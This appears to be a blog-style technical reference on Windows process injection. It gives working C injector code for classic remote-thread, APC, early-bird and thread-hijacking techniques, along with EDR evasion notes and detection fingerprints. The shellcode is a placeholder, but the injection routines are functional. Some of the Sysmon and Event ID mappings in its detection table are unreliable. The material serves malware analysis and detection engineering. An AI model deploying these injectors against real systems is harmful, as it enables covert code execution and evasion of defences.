Windows Shellcode Injection: A Technical Reference
A technical reference covering the most common process injection techniques used in Windows malware — VirtualAllocEx/WriteProcessMemory, APC injection, early-bird injection, and thread hijacking. Includes C code, EDR evasion context, and detection points for each technique.
Note: This post is educational. Understanding how injection works is fundamental to detection engineering, malware analysis, and defensive product development.
Overview
Process injection is the mechanism by which code in one process executes in the context of another. Malware uses this to:
- Execute from a trusted process (evading application whitelisting)
- Access another process’s memory or handles
- Hide from simple process enumeration
The Windows API provides numerous primitives that can be combined to achieve injection. We’ll walk through the most prevalent techniques with working C code, then look at what each looks like to a defender.
Technique 1: Classic VirtualAllocEx / WriteProcessMemory
The textbook technique. Widely detected, but still used in commodity malware because it works.
How It Works
- Open a handle to the target process with
PROCESS_ALL_ACCESS - Allocate RWX memory in the target with
VirtualAllocEx - Copy shellcode in with
WriteProcessMemory - Create a remote thread at the shellcode address with
CreateRemoteThread
Code
#include <windows.h>
#include <stdio.h>
// Placeholder shellcode — replace with real payload
// This is just a NOP sled + INT3 for demonstration
unsigned char shellcode[] = {
0x90, 0x90, 0x90, 0x90, // NOP sled
0xCC // INT3 (breakpoint)
};
SIZE_T shellcode_len = sizeof(shellcode);
BOOL inject_classic(DWORD pid) {
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
LPVOID remote_mem = NULL;
BOOL result = FALSE;
// Step 1: Open the target process
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!hProcess) {
fprintf(stderr, "[-] OpenProcess failed: %lu\n", GetLastError());
goto cleanup;
}
// Step 2: Allocate RWX memory in target
remote_mem = VirtualAllocEx(
hProcess,
NULL,
shellcode_len,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if (!remote_mem) {
fprintf(stderr, "[-] VirtualAllocEx failed: %lu\n", GetLastError());
goto cleanup;
}
// Step 3: Write shellcode
SIZE_T bytes_written = 0;
if (!WriteProcessMemory(hProcess, remote_mem, shellcode, shellcode_len, &bytes_written)) {
fprintf(stderr, "[-] WriteProcessMemory failed: %lu\n", GetLastError());
goto cleanup;
}
// Step 4: Create remote thread
hThread = CreateRemoteThread(hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);
if (!hThread) {
fprintf(stderr, "[-] CreateRemoteThread failed: %lu\n", GetLastError());
goto cleanup;
}
WaitForSingleObject(hThread, INFINITE);
result = TRUE;
printf("[+] Injection complete\n");
cleanup:
if (hThread) CloseHandle(hThread);
if (hProcess) CloseHandle(hProcess);
return result;
}
Detection Fingerprint
| API Call | Event / Telemetry |
|---|---|
OpenProcess |
Sysmon Event ID 10 (ProcessAccess) |
VirtualAllocEx |
Sysmon Event ID 8 (CreateRemoteThread) |
WriteProcessMemory |
ETW: Microsoft-Windows-Kernel-Process |
CreateRemoteThread |
Sysmon Event ID 8, Windows Event 4688 |
The RWX allocation is the loudest signal. Most EDRs flag PAGE_EXECUTE_READWRITE allocations in remote processes immediately.
Technique 2: APC Injection
Asynchronous Procedure Calls (APCs) are a Windows mechanism for executing functions in the context of a thread. Every thread has an APC queue; functions queued to it run when the thread enters an alertable wait state.
How It Works
- Open the target process and enumerate its threads
- Queue an APC to each thread with
QueueUserAPC - The APC fires when any thread calls
SleepEx,WaitForSingleObjectEx, etc. withbAlertable = TRUE
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
// Find all threads belonging to a process
DWORD* get_thread_ids(DWORD pid, DWORD* count) {
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (snapshot == INVALID_HANDLE_VALUE) return NULL;
THREADENTRY32 te = { .dwSize = sizeof(THREADENTRY32) };
DWORD capacity = 64;
DWORD* tids = (DWORD*)malloc(capacity * sizeof(DWORD));
*count = 0;
if (Thread32First(snapshot, &te)) {
do {
if (te.th32OwnerProcessID == pid) {
if (*count >= capacity) {
capacity *= 2;
tids = (DWORD*)realloc(tids, capacity * sizeof(DWORD));
}
tids[(*count)++] = te.th32ThreadID;
}
} while (Thread32Next(snapshot, &te));
}
CloseHandle(snapshot);
return tids;
}
BOOL inject_apc(DWORD pid, unsigned char* shellcode, SIZE_T len) {
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (!hProcess) return FALSE;
// Allocate and write shellcode (same as classic technique)
LPVOID remote_mem = VirtualAllocEx(hProcess, NULL, len,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remote_mem) { CloseHandle(hProcess); return FALSE; }
SIZE_T written;
WriteProcessMemory(hProcess, remote_mem, shellcode, len, &written);
// Queue APC to all threads
DWORD thread_count = 0;
DWORD* tids = get_thread_ids(pid, &thread_count);
for (DWORD i = 0; i < thread_count; i++) {
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, tids[i]);
if (hThread) {
QueueUserAPC((PAPCFUNC)remote_mem, hThread, 0);
CloseHandle(hThread);
}
}
free(tids);
CloseHandle(hProcess);
printf("[+] APC queued to %lu threads in PID %lu\n", thread_count, pid);
return TRUE;
}
Reliability Problem
APC injection only executes when a thread enters an alertable wait. Many processes never do this on their main threads. The workaround is targeting processes known to use alertable waits (svchost.exe running certain services, explorer.exe, etc.) or using Early-Bird injection below.
Detection Fingerprint
QueueUserAPC is less commonly monitored than CreateRemoteThread. Some EDRs check the APC target address against known-good regions. ETW providers in the Windows kernel emit events for APC queue operations, but most commercial SIEMs don’t collect these by default.
Technique 3: Early-Bird APC Injection
Early-Bird solves the alertable wait problem by creating a suspended process, queuing the APC before it runs any code, then resuming it. The first thing the main thread does on resume is process its APC queue.
BOOL inject_earlybird(const char* target_path, unsigned char* shellcode, SIZE_T len) {
STARTUPINFOA si = { .cb = sizeof(si) };
PROCESS_INFORMATION pi = {0};
// Create target process in suspended state
if (!CreateProcessA(
target_path, NULL, NULL, NULL,
FALSE,
CREATE_SUSPENDED, // <-- key flag
NULL, NULL, &si, &pi)) {
fprintf(stderr, "[-] CreateProcess failed: %lu\n", GetLastError());
return FALSE;
}
printf("[*] Created suspended PID: %lu, TID: %lu\n", pi.dwProcessId, pi.dwThreadId);
// Allocate and write shellcode
LPVOID remote_mem = VirtualAllocEx(pi.hProcess, NULL, len,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!remote_mem) {
TerminateProcess(pi.hProcess, 1);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return FALSE;
}
SIZE_T written;
WriteProcessMemory(pi.hProcess, remote_mem, shellcode, len, &written);
// Queue APC to the main thread (it's still suspended)
QueueUserAPC((PAPCFUNC)remote_mem, pi.hThread, 0);
// Resume — main thread immediately enters alertable state via ntdll init
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
printf("[+] Early-bird injection complete\n");
return TRUE;
}
Early-Bird is reliable precisely because the APC fires before the target process’s own initialization code runs. It’s also quieter than CreateRemoteThread, though it does create a new (potentially anomalous) process.
Technique 4: Thread Hijacking (SetThreadContext)
Hijack an existing thread by suspending it, overwriting its instruction pointer, and resuming.
BOOL inject_thread_hijack(DWORD pid, unsigned char* shellcode, SIZE_T len) {
// Find a suitable thread (not the main thread ideally)
DWORD thread_count = 0;
DWORD* tids = get_thread_ids(pid, &thread_count);
if (!tids || thread_count == 0) return FALSE;
DWORD target_tid = tids[0];
free(tids);
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, target_tid);
if (!hProcess || !hThread) return FALSE;
// Suspend the thread
SuspendThread(hThread);
// Get current context
CONTEXT ctx;
ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(hThread, &ctx);
// Allocate shellcode in target process
LPVOID remote_mem = VirtualAllocEx(hProcess, NULL, len,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
SIZE_T written;
WriteProcessMemory(hProcess, remote_mem, shellcode, len, &written);
// Redirect instruction pointer to shellcode
#ifdef _WIN64
ctx.Rip = (DWORD64)remote_mem;
#else
ctx.Eip = (DWORD)remote_mem;
#endif
SetThreadContext(hThread, &ctx);
// Resume thread — it will execute our shellcode
ResumeThread(hThread);
CloseHandle(hThread);
CloseHandle(hProcess);
printf("[+] Thread %lu hijacked in PID %lu\n", target_tid, pid);
return TRUE;
}
Limitations
Thread hijacking is noisy on the target process — the hijacked thread’s legitimate work doesn’t complete. If the thread was in the middle of a database query or network request, the process may crash or hang. It also uses SuspendThread + GetThreadContext + SetThreadContext, all of which are monitored by most EDRs.
Comparison Summary
| Technique | Reliability | Noise Level | Primary Detection |
|---|---|---|---|
| Classic VirtualAllocEx | High | High | Sysmon EID 8, RWX alloc |
| APC Injection | Medium | Medium | QueueUserAPC on remote thread |
| Early-Bird APC | High | Medium | New process + QueueUserAPC |
| Thread Hijacking | Medium-High | High | SuspendThread + SetThreadContext |
Detection Perspective
If you’re building detections, the key behavioral indicators are:
- Cross-process memory allocation —
VirtualAllocExfrom a process that isn’t the target - Cross-process write —
WriteProcessMemoryfollowing a remote allocation - Remote thread creation —
CreateRemoteThreadwhere the start address is in a heap allocation (not a known module) - APC to remote thread —
QueueUserAPCwhere the APC function address is in remote-allocated memory - Suspended process + APC —
CREATE_SUSPENDEDprocess creation followed quickly by a remote write andQueueUserAPCto the main thread - Context modification —
SetThreadContextchanging RIP/EIP to an address outside any loaded module
A single event isn’t sufficient — chains of events in sequence within a short time window are what matter. Process activity graphs (BloodHound-style, but for process behavior) are the right tool for catching these patterns.
Further Reading
The Windows Internals series (Yosifovich, Solomon, et al.) covers APC mechanics in detail. For detection engineering, the Elastic Detection Rules repository is a good reference for how these techniques translate to detection logic.